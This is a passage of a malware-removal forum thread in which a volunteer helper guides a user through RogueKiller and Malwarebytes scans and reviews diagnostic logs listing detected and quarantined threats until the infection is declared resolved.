2017-09-02 20:35 - 2016-11-05 09:00 - 000000000 ____D C:\Users\XYZ\AppData\Local\CrashDumps
2017-09-02 20:35 - 2014-12-31 16:54 - 000000000 ____D C:\Users\XYZ\AppData\Local\Spotify
2017-09-02 20:34 - 2013-08-27 12:15 - 000000000 ____D C:\ProgramData\NVIDIA
2017-09-02 20:34 - 2009-07-14 01:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2017-09-02 17:38 - 2015-06-18 22:11 - 000000866 _____ C:\Windows\Tasks\DropboxUpdateTaskUserS-1-5-21-1331985295-2685822398-3683760129-1000Core.job
2017-09-01 18:41 - 2015-09-14 16:37 - 000229872 _____ C:\Windows\ntbtlog.txt
2017-09-01 18:10 - 2017-05-23 21:46 - 000002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-09-01 17:54 - 2013-08-27 12:15 - 000000000 ____D C:\Users\UpdatusUser
2017-09-01 17:53 - 2014-10-05 18:30 - 000000000 ____D C:\Users\XYZ\AppData\LocalLow\Temp
2017-08-31 20:42 - 2013-08-23 19:41 - 000072328 _____ C:\Users\XYZ\AppData\Local\GDIPFONTCACHEV1.DAT
2017-08-31 20:42 - 2009-07-14 00:45 - 000315544 _____ C:\Windows\system32\FNTCACHE.DAT
2017-08-28 22:52 - 2013-08-23 20:02 - 000002208 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-08-23 17:07 - 2013-11-10 21:46 - 000000000 ____D C:\Users\XYZ\AppData\Roaming\Dropbox
2017-08-22 22:52 - 2016-09-23 19:20 - 000000000 ____D C:\Users\XYZ\Documents\Nexus Mod Manager
2017-08-22 21:25 - 2017-03-08 18:34 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-08-22 21:25 - 2017-03-08 18:34 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-08-21 23:05 - 2017-03-08 18:35 - 000000000 ____D C:\Users\XYZ\AppData\LocalLow\Mozilla
2017-08-21 19:44 - 2013-08-23 19:39 - 000000000 ____D C:\Users\XYZ
2017-08-21 16:03 - 2014-05-19 23:54 - 000000000 ____D C:\ProgramData\Package Cache
2017-08-21 15:50 - 2015-11-10 01:16 - 000000000 ____D C:\Users\XYZ\AppData\Local\Fallout4
2017-08-16 22:11 - 2013-12-30 15:22 - 000000000 ____D C:\Users\XYZ\AppData\Local\Black_Tree_Gaming
2017-08-13 22:08 - 2015-01-02 16:19 - 000004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2017-08-03 15:01 - 2013-08-26 18:59 - 000000000 ____D C:\Users\XYZ\AppData\Roaming\uTorrent
 
==================== Files in the root of some directories =======
 
2013-08-26 16:52 - 2013-08-26 16:55 - 000000253 _____ () C:\Users\XYZ\AppData\Roaming\ANICONFIG_{D4B2AF1C-DAFF-4A89-862D-6477BB84FB60}.ini
2013-08-27 12:34 - 2015-11-05 16:52 - 002128896 _____ () C:\Users\XYZ\AppData\Local\file__0.localstorage
2016-07-13 17:46 - 2016-10-16 00:06 - 000007615 _____ () C:\Users\XYZ\AppData\Local\Resmon.ResmonCfg
2013-09-03 18:45 - 2013-09-03 18:45 - 000000057 _____ () C:\ProgramData\Ament.ini
2002-01-13 02:59 - 2002-01-13 02:59 - 000000000 ____H () C:\ProgramData\sdpsenv.dat
 
Files to move or delete:
====================
C:\ProgramData\sdpsenv.dat
 
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
LastRegBack: 2016-12-04 18:37
 
==================== End of FRST.txt ============================
 
Thank you for your time! Any help is appreciated  :)
 
Doxxy

Edited by Doxxy, 03 September 2017 - 07:40 PM.


BC AdBot (Login to Remove)

 


#2 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,664 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:08:05 PM

Posted 02 September 2017 - 11:40 PM

Hi Doxxy :)

My name is Aura and I'll be assisting you with your malware issue. Since we'll be working together, you can call me Aura or Yoan, which is my real name, it's up to you! Now that we've broke the ice, I'll just ask you a few things during the time we'll be working together to clean your system and get it back to an operational state.
  • As you'll notice, the logs we are asking for here are quite lenghty, so it's normal for me to not reply exactly after you post them. This is because I need some time to analyse them and then act accordingly. However, I'll always reply within 24 hours, 48 hours at most if something unexpected happens
  • As long as I'm assisting you on Malwarebytes Forums, in this thread, I'll ask you to not seek assistance anywhere else for any issue related to the system we are working on. If you have an issue, question, etc. about your computer, please ask it in this thread and I'll assist you
  • The same principle applies to any modifications you make to your system, I would like you to ask me before you do any manipulations that aren't in the instructions I posted. This is to ensure that we are operating in sync and I know exactly what's happening on your system
  • If you aren't sure about an instruction I'm giving you, ask me about it. This is to ensure that the clean-up process goes without any issue. I'll answer you and even give you more precise instructions/explanations if you need. There's no shame in asking questions here, better be safe than sorry!
  • If you don't reply to your thread within 3 days, I'll bump this thread to let you know that I'm waiting for you. If you don't reply after 5 days, it'll be closed. If you return after that period, you can send me a PM to get it unlocked and we'll continue where we left off;
  • Since malware can work quickly, we want to get rid of them as fast as we can, before they make unknown changes to the system. This being said, I would appreciate if you could reply to this thread within 24 hours of me posting. This way, we'll have a good clean-up rhythm and the chances of complications will be reduced
  • I'm against any form of pirated, illegal and counterfeit software and material. So if you have any installed on your system, I'll ask you to uninstall them right now. You don't have to tell me if you indeed had some or not, I'll give you the benefit of the doubt. Plus, this would be against Malwarebytes Forums's rules
  • In the end, you are the one asking for assistance here. So if you wish to go a different way during the clean-up, like format and reinstall Windows, you are free to do so. I would appreciate you to let me know about it first, and if you need, I can also assist you in the process
  • I would appreciate if you were to stay with me until the end, which means, until I declare your system clean. Just because your system isn't behaving weirdly anymore, or is running better than before, it doesn't mean that the infection is completely gone
    This being said, I have a full time job so sometimes it'll take longer for me to reply to you. Don't worry, you'll be my first priority as soon as I get home and have time to look at your thread
This being said, it's time to clean-up some malware, so let's get started, shall we? :)

RQKuhw1.pngRogueKiller
  • Download the right version of RogueKiller for your Windows version (32 or 64-bit)
  • Once done, move the executable file to your Desktop, right-click on it and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users)
  • Click on the Start Scan button in the right panel, which will bring you to another tab, and click on it again (this time it'll be in the bottom right corner)
  • Wait for the scan to complete
  • On completion, the results will be displayed
  • Check every single entry (threat found), and click on the Remove Selected button
  • On completion, the results will be displayed. Click on the Open Report button in the bottom left corner, followed by the Open TXT button (also in the bottom left corner)
  • This will open the report in Notepad. Copy/paste its content in your next reply

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#3 Doxxy

Doxxy
  • Topic Starter

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:08:05 PM

Posted 03 September 2017 - 09:54 AM

Hey Aura!
 
Thanks for getting back to me so quickly.  I ran through RogueKiller, here is the log:
 
RogueKiller V12.11.12.0 (x64) [Aug 28 2017] (Free) by Adlice Software
 
Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : XYZ [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Mode : Delete -- Date : 09/03/2017 10:07:29 (Duration : 00:16:40)
 
¤¤¤ Processes : 0 ¤¤¤
 
¤¤¤ Registry : 8 ¤¤¤
[PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-1331985295-2685822398-3683760129-1001\Software\iVIDI Plugin -> Deleted
[PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-1331985295-2685822398-3683760129-1001\Software\Myfree Codec -> Deleted
[PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-1331985295-2685822398-3683760129-1001\Software\iVIDI Plugin -> Deleted
[PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-1331985295-2685822398-3683760129-1001\Software\Myfree Codec -> Deleted
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters | DhcpNameServer : 216.104.96.22 216.104.98.222 ([Canada][Canada])  -> Replaced ()
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters | DhcpNameServer : 216.104.96.22 216.104.98.222 ([Canada][Canada])  -> Replaced ()
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{FE7A27F3-EA0A-4F7A-84BE-9DB5984BB7B3} | DhcpNameServer : 216.104.96.22 216.104.98.222 ([Canada][Canada])  -> Replaced ()
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters\Interfaces\{FE7A27F3-EA0A-4F7A-84BE-9DB5984BB7B3} | DhcpNameServer : 216.104.96.22 216.104.98.222 ([Canada][Canada])  -> Replaced ()
 
¤¤¤ Tasks : 1 ¤¤¤
[Hj.Shortcut] \{AE0ED555-92DF-4894-9EF1-CFA5244D29A9} -- "c:\program files (x86)\google\chrome\application\chrome.exe" (http://ui.skype.com/ui/0/7.26.80.101/en/abandoninstall?page=tsProgressBar) -> Deleted
 
¤¤¤ Files : 9 ¤¤¤
[Tr.Gen0][File] C:\Users\XYZ\AppData\Roaming\uTorrent\updates\3.4.5_41073\utorrentie.exe -> Deleted
[Tr.Gen0][File] C:\Users\XYZ\AppData\Roaming\uTorrent\updates\3.4.5_41202\utorrentie.exe -> Deleted
[Tr.Gen0][File] C:\Users\XYZ\AppData\Roaming\uTorrent\updates\3.4.5_41372\utorrentie.exe -> Deleted
[Tr.Gen0][File] C:\Users\XYZ\AppData\Roaming\uTorrent\updates\3.4.5_41865\utorrentie.exe -> Deleted
[Tr.Gen0][File] C:\Users\XYZ\AppData\Roaming\uTorrent\updates\3.4.6_42094\utorrentie.exe -> Deleted
[Tr.Gen0][File] C:\Users\XYZ\AppData\Roaming\uTorrent\updates\3.4.7_42330\utorrentie.exe -> Deleted
[Tr.Gen0][File] C:\Users\XYZ\AppData\Roaming\uTorrent\updates\3.4.9_42973\utorrentie.exe -> Deleted
[Tr.Gen0][File] C:\Users\XYZ\AppData\Roaming\uTorrent\updates\3.4.9_43388\utorrentie.exe -> Deleted
[Tr.Gen0][File] C:\Users\XYZ\AppData\Roaming\uTorrent\updates\3.5.0_43580\utorrentie.exe -> Deleted
 
¤¤¤ WMI : 0 ¤¤¤
 
¤¤¤ Hosts File : 0 ¤¤¤
 
¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤
 
¤¤¤ Web browsers : 2 ¤¤¤
[PUP.Gen0][Chrome:Addon] Default : Lone Tree [hfmkllfplegemejikoabfpjdaoncphip] -> Deleted
[PUM.HomePage][Chrome:Config] Default [SecurePrefs] : session.startup_urls [http://google.ca/] -> Deleted
 
¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: ST120HM000-1G5142 ATA Device +++++
--- User ---
[MBR] 0d2dd675f7363619fcd00a1bd07e273c
[BSP] da401ed7fe71cfc286e96cb188fa65fb : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 114371 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK
 
+++++ PhysicalDrive1: WDC WD1002FAEX-00Z3A0 ATA Device +++++
--- User ---
[MBR] a761f8352431f684a79aa254a5f3a7d8
[BSP] 4f6f8e3c37a070cf73a7d6c8a9b20a37 : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 953867 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK
 
 
Strangely enough, when I booted this morning, WSE did not detect the Powemet.B!attk.  However, after rebooting post-Roguekiller it is back.  Should I attempt RogueKiller again or do you have something else in mind?
 
Thanks,
 
Doxxy

Edited by Doxxy, 03 September 2017 - 07:39 PM.


#4 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,664 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:08:05 PM

Posted 03 September 2017 - 10:28 AM

I have something else in mind :) Now, let's run a scan with Malwarebytes.

j1Bynr2.pngMalwarebytes - Clean Mode
  • Download and install the free version of Malwarebytes
    Note: If you have Malwarebytes already installed, you don't need to install it again. Simply start from the next bullet point
  • Once Malwarebytes is installed, launch it and let it update his database. You might have to click on the little arrow by Scan Status in the middle right pane for it to do so
  • Once the database update is complete, click on the Scan tab, then select the Threat Scan button and click on Start Scan
  • Let the scan run, the time required to complete the scan depends of your system and computer specs
  • Once the scan is complete, make sure that the first checkbox at the top is checked (which will automatically check every detected item), then click on the Quarantine Selected button
    • If it asks you to restart your computer to complete the removal, do so
  • Click on Export Summary after the deletion (in the bottom-left corner) and select Copy to Clipboard. Paste the content in your next reply

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#5 Doxxy

Doxxy
  • Topic Starter

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:08:05 PM

Posted 03 September 2017 - 12:53 PM

Hey Aura!

 

Here is the Malwarebytes report:

 

Malwarebytes
www.malwarebytes.com
 
-Log Details-
Scan Date: 9/3/17
Scan Time: 1:45 PM
Log File: b2a32d1a-90cf-11e7-af2b-60a44c624579.json
Administrator: Yes
 
-Software Information-
Version: 3.2.2.2018
Components Version: 1.0.186
Update Package Version: 1.0.2719
License: Trial
 
-System Information-
OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: XYZ-PC\XYZ
 
-Scan Summary-
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 380382
Threats Detected: 3
Threats Quarantined: 3
Time Elapsed: 1 min, 41 sec
 
-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Detect
PUM: Detect
 
-Scan Details-
Process: 0
(No malicious items detected)
 
Module: 0
(No malicious items detected)
 
Registry Key: 0
(No malicious items detected)
 
Registry Value: 2
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|START, Quarantined, [458], [400553],1.0.2719
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|START1, Quarantined, [458], [396503],1.0.2719
 
Registry Data: 0
(No malicious items detected)
 
Data Stream: 0
(No malicious items detected)
 
Folder: 1
Rogue.Multiple, C:\PROGRAMDATA\374311380, Quarantined, [8766], [170100],1.0.2719
 
File: 0
(No malicious items detected)
 
Physical Sector: 0
(No malicious items detected)
 
 
(end)
 
Upon reboot, MSE has not seemed to detect B!attk (the history mentions my boot this morning and the boot from this afternoon, but not the reboot post-Malwarebytes).
 
I am painting my house, so I may be a few hours getting back to you next time :)
 
Thanks!
 
Doxxy

Edited by Doxxy, 03 September 2017 - 07:41 PM.


#6 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,664 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:08:05 PM

Posted 03 September 2017 - 12:59 PM

Malwarebytes took care of the threat.
Registry Value: 2
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|START, Quarantined, [458], [400553],1.0.2719
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|START1, Quarantined, [458], [396503],1.0.2719
If you want, you can let your computer run, and launch a new scan with MSE later on after your painting to see if it detects it or not, but I doubt :)

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#7 Doxxy

Doxxy
  • Topic Starter

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:08:05 PM

Posted 03 September 2017 - 07:42 PM

Hey Aura!

 

While I was painting I ran a full system scan.  MSE did not find anything malicious! Looks to be all good :)

 

Thanks so much for all your help, have a great long weekend!

 

Doxxy


Edited by Doxxy, 03 September 2017 - 07:42 PM.


#8 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,664 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:08:05 PM

Posted 03 September 2017 - 08:27 PM

No problem Doxxy, you're welcome!

Stay safe :)

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#9 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,664 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:08:05 PM

Posted 03 September 2017 - 08:27 PM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users